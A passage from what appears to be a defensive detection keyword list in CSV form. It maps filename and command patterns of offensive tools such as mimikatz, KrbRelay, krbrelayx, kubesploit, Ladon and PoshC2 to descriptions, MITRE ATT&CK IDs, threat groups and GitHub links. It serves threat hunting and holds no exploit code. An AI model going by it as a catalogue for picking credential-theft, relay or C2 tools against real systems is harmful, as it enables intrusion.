AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" +"*krbjacker.py*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" +"*krbjack-main*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" +"*KrbRelay*misc*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" +"*KrbRelay*smb*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" +"*KrbRelay*spoofing*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" +"*KrbRelay.csproj*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" +"*KrbRelay.exe*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" +"*KrbRelay.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*KrbRelay.sln*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" +"*KrbRelayUp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*krbrelayx*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/dirkjanm/krbrelayx","1","0","N/A","10","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*krbrelayx.git*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*krbrelayx.py -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*krbrelayx.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*krbrelayx-master*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*krbroast-pcap2hashcat.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" +"*KRBUACBypass 1*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" +"*KRBUACBypass.csproj*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" +"*KRBUACBypass.exe*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" +"*KRBUACBypass.sln*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" +"*ktsuss-lpe.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*kubeletAttack.json*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*Kubesploit Agent*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*kubesploitAgent-Darwin*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*kubesploitAgent-Linux*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*kubesploit-main*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*kubesploitServer-Darwin*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*kubesploitServer-Linux*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*kuhl_m_sekurlsa_nt6.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kuhl_m_sekurlsa_nt6.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kuhl_m_sekurlsa_packages.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kuhl_m_sekurlsa_packages.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kuhl_m_sekurlsa_utils.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kuhl_m_sekurlsa_utils.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kwallet2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*kwetza*","offensive_tool_keyword","kwetza","Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. Kwetza allows you to infect Android applications using the target applications default permissions or inject additional permissions to gain additional functionality.","T1402 - T1027 - T1059.001 - T1574.002 - T1583.001 - T1588.002","TA0001 - TA0004 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/sensepost/kwetza","1","0","N/A","N/A","7","604","256","2023-07-21T16:30:40Z","2016-09-22T14:39:10Z" +"*kyleavery/AceLdr*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*kyleavery/inject-assembly*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" +"*L0phtCrack*","offensive_tool_keyword","L0phtCrack","L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations. networked servers. primary domain controllers. or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary. brute force. etc). LC5 was discontinued by Symantec in 2006. then re-acquired by the original L0pht guys and reborn as LC6 in 2009. For free alternatives. consider ophcrack. Cain and Abel. or John the Ripper. For downloads and more information. visit the L0phtCrack homepage.","T1003 - T1110 - T1212 - T1552 - T1609","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","http://www.l0phtcrack.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*label-implant *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Ladon * AllScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon * CiscoScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon * OnlineIP*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon * OnlinePC*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon * OsScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon * OxidScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 